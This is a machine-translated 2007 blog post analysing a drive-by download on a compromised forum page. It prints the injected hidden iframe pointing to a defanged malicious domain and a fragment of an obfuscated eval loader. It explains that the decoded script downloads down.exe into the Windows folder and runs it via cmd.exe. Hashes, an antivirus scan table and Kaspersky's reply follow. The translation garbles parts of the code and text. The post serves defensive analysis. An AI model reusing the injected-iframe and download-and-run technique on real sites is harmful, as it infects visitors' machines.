Down.exe/virus. win32.autorun. Z/Trojan. PWS. maran.262
EndurerOriginal
2Added replies from Kaspersky.
1Version
When you open a page that is occasionally used in the Forum, rising prompts you to download and run suspicious files.
Search by Google, and Google has already marked it:
Http://www.google.cn/search? Complete = 1 & HL = ZH-CN & newwindow = 1 & Q = % E8 % BF % 98% E7 % 8f % A0 % E5 % 8C % Ba + % E6 % 97% A7 % e9 % 9B % A8 % E6 % a5 % BC % E6 % B8 % 85% E9 % A3 % 8e % E9 % 98% 81 & meta =
Check the webpage code and add it:
/---
<IFRAME src = hxxp: // I **. x *** in ** 8.info/wm.htm width = 1 Height = 1> </iframe>
---/
Hxxp: // I ***. x *** in *** 8.info/wm.htmCode included:
/---
<SCRIPT src = 0614.js> </SCRIPT>
---/
Hxxp: // I **. x ** in ** 8.info/0614.jsContent:
/---
Eval ("/146/165/156/143 /... (Omitted )... /146/75/61/73/175 ")
---/
After two decryption, the original code is obtained. The function is to download down.exe and save it to % WINDIR %. The file name is defined by the UDF:
/---
Function qk45u3 (rm4mf) {var m0qnw = Window ["math"] ["random"] () * rm4mf; return math1_1_round1_1_1_(m0qnw1_1_1_'.exe ';}
---/
That is, ***. EXE, where * is a number, and runs through cmd.exe/C.
File Description: D:/test/down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19602 bytes, 19.146 KB
MD5: a329a121353d80b9871119788f7b14c7
Nspack 1.3-> North Star/Liu Xing Ping
File down.exe received at 09:14:12 (CET)
Current status: Completed
Anti-Virus engine |
Version |
Last update |
Scan results |
AhnLab-V3 |
2007.7.28.0 |
2007.07.27 |
Win-Trojan/hupigon. gen |
AntiVir |
7.4.0.50 |
2007.07.27 |
TR/agent.19602 |
Authentium |
4.93.8 |
2007.07.27 |
Possibly a new variant of W32/threat-hllin-slipper-based! Maximus |
Avast |
4.7.997.0 |
2007.07.27 |
Win32: Small-AMI |
AVG |
7.5.0.476 |
2007.07.27 |
Downloader. generic5.eca |
BitDefender |
7.2 |
2007.07.28 |
Genpack: Generic. malware. wbdld.92022134 |
Cat-quickheal |
9.00 |
2007.07.26 |
(Suspicious)-dnascan |
ClamAV |
0.91 |
2007.07.28 |
- |
Drweb |
4.33 |
2007.07.27 |
Trojan. PWS. maran.262 |
Esafe |
7.0.15.0 |
2007.07.24 |
Suspicious Trojan/Worm |
ETrust-vet |
31.1.5010 |
2007.07.28 |
- |
Ewido |
4.0 |
2007.07.27 |
- |
Fileadvisor |
1 |
2007.07.28 |
- |
Fortinet |
2.91.0.0 |
2007.07.28 |
- |
F-Prot |
4.3.2.48 |
2007.07.27 |
W32/threat-hllin-slipper-based! Maximus |
F-Secure |
6.70.13030.0 |
2007.07.27 |
W32/hupigon. gen67 |
Ikarus |
T3.1.1.8 |
2007.07.27 |
Backdoor. win32.agent. ahj |
Kaspersky |
4.0.2.24 |
2007.07.28 |
- |
McAfee |
5085 |
2007.07.27 |
- |
Microsoft |
1.2704 |
2007.07.28 |
- |
Nod32v2 |
2426 |
2007.07.27 |
A variant of Win32/trojandownloader. Delf. NSA |
Norman |
5.80.02 |
2007.07.27 |
W32/hupigon. gen67 |
Panda |
9.0.0.4 |
2007.07.28 |
Generic Trojan |
Rising |
19.33.42.00 |
2007.07.27 |
- |
Prevx1 |
V2 |
2007.07.28 |
W32.malware. gen |
Sophos |
4.19.0 |
2007.07.26 |
Mal/packer |
Sunbelt |
2.2.907.0 |
2007.07.28 |
Vipre. Suspicious |
Symantec |
10 |
2007.07.28 |
- |
Thehacker |
6.1.7.155 |
2007.07.28 |
- |
Vba32 |
3.12.2.1 |
2007.07.27 |
Malwarw.Trojan-PSW.Game.14 |
Virusbuster |
4.3.26: 9 |
2007.07.27 |
- |
Webcycler-Gateway |
6.0.1 |
2007.07.28 |
Trojan. agent.19602 |
Additional information
File Size: 19602 bytes
MD5: a329a121353d80b9871119788f7b14c7
Sha1: cd849c87c62a23adc01b3d9c1b3c1e5b848faa03
Prevx info: http://fileinfo.prevx.com/fileinfo.asp? Px5 = cbb0e79992c2fa964c9000f9f5065b00efb6d5a7
Sunbelt info: vipre. Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
Subject: |
Re: [KLAB-2516758] |
Sender: |
"" <Newvirus@kaspersky.com> |
Sent at: 16:16:38 |
Hello.
Virus. win32.autorun. Z
New malicious software was found in the attached file.
It's detection will be removed in the next update. Thank you for your help.
-----------------
Regards, Yury nesmachny
Virus analyst, Kaspersky Lab.